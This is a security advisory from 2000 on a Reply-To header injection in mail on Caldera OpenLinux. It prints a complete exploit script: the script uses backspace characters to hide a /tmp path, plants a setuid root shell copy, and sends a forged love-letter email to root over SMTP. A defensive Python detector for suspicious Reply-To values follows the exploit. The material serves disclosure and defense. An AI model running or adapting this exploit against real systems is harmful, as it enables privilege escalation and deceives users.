Multiple systems: attack through the Mail Reply-To field

Published: 2000-11-07
Updated: 2000-11-07
Severity: High
Threat level: local administrator privileges
Error type: input validation error
Exploitation: server mode

Affected systems

Caldera OpenLinux 2.4

Detailed description

An attacker composes a mail whose Reply-To field contains shell metacharacters and sends it to the target user. Normally the recipient would notice the dangerous characters when reading the message and simply delete it. However, if the field also contains the special control character ^H (backspace), the recipient does not see the dangerous characters when viewing the message, and arbitrary commands are executed.

Test code

#!/bin/sh
#
# I-Love-U.sh
# Exploit for | char in mail Reply-To field
# tested on linux Caldera (techno preview linux 2.4.0)
#
# Gregory Duchemin ( AKA C3rb3r )
# Security Consultant
#
# NEUROCOM CANADA
# 1001 bd Maisonneuve Ouest
# Montreal (Quebec) H3A 3C8 Canada
# c3rb3r@hotmail.com

# Cook Ingredients: one | char (hidden in an uppercase i),
# a bit of evil ^H to hide "/tmp/", and a girl to stimulate a reply ;)
#

cd /tmp
cat ^H^H^H^H^Hsabelle@hotmail.com << _End
#!/bin/sh
cp /bin/sh /tmp/newsh
chmod a+rws /tmp/newsh
_End

{
sleep 1
echo "HELO hotmail.com"
sleep 1
echo "MAIL FROM:<Isabelle@hotmail.com>"
sleep 1
echo "RCPT TO:<root>"
sleep 1
echo "DATA"
sleep 1
# Reply-to will appear as Reply-To:<|sabelle@hotmail.com>
echo "Reply-To:<|/tmp/^H^H^H^H^Hsabelle@hotmail.com>"
sleep 1
echo
echo "I saw you yesterday, since i'm a bit confused..i just wanted"
echo "to say you."
echo "I believe I LOVE YOU"
echo
echo "Isabelle."
echo "."
sleep 1
echo "QUIT"
sleep 2
}|telnet localhost 25

echo "Job is done...now check for newsh in /tmp"
echo
echo

Solution

None available yet.

Related information
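The display trick described above (backspaces erase "/tmp/" on screen, so the victim sees <|sabelle@hotmail.com> while the mail reader receives the full pipe command) can be caught at the mail gateway by comparing the raw header with what a terminal would render. The following is an added defender-side example, not part of the original advisory: it extracts Reply-To values from a raw message, reconstructs the displayed text, and flags control characters and shell metacharacters; the sample message and all function names are constructed for this example.

```python
import re

# Characters a mail reader may pass to a shell when it treats the address as a
# command; the advisory's exploit relies on the pipe character.
SHELL_META = set("|;&`$(){}")

# Control characters that change what a terminal displays. Backspace (\x08,
# shown as ^H in the advisory) is the one used to hide "/tmp/".
CONTROL_CHARS = {"\x08", "\x00", "\x1b", "\r", "\x7f"}

# Constructed sample message mirroring the header the advisory's script sends.
SAMPLE_MESSAGE = (
    "From: Isabelle@hotmail.com\r\n"
    "To: root\r\n"
    "Reply-To:<|/tmp/\x08\x08\x08\x08\x08sabelle@hotmail.com>\r\n"
    "\r\n"
    "I believe I LOVE YOU\r\n"
)

def reply_to_values(raw_message):
    """Return all Reply-To values from a raw message (folded lines unfolded)."""
    headers = raw_message.replace("\r\n", "\n").partition("\n\n")[0]
    headers = re.sub(r"\n[ \t]+", " ", headers)
    pattern = re.compile(r"^reply-to:[ \t]*(.*)$", re.IGNORECASE)
    return [m.group(1) for m in map(pattern.match, headers.split("\n")) if m]

def render_as_terminal(value):
    """Simulate a terminal: backspace erases the previous visible character,
    other control characters vanish. This is what the victim actually sees."""
    shown = []
    for ch in value:
        if ch == "\x08":
            if shown:
                shown.pop()
        elif ch not in CONTROL_CHARS:
            shown.append(ch)
    return "".join(shown)

def inspect_reply_to(raw_value):
    """Verdict for one raw Reply-To value: displayed text, whether anything
    was hidden, and which shell metacharacters the real value carries."""
    shown = render_as_terminal(raw_value)
    metas = sorted({c for c in raw_value if c in SHELL_META})
    has_ctrl = any(c in CONTROL_CHARS for c in raw_value)
    return {
        "displayed": shown,
        "hidden_text": shown != raw_value,
        "shell_metachars": metas,
        "suspicious": bool(metas) or has_ctrl,
    }
```

Run `inspect_reply_to` over each value returned by `reply_to_values`; a message whose displayed address differs from the raw one, or whose raw value contains shell metacharacters, should be quarantined rather than delivered to a reader that may execute it.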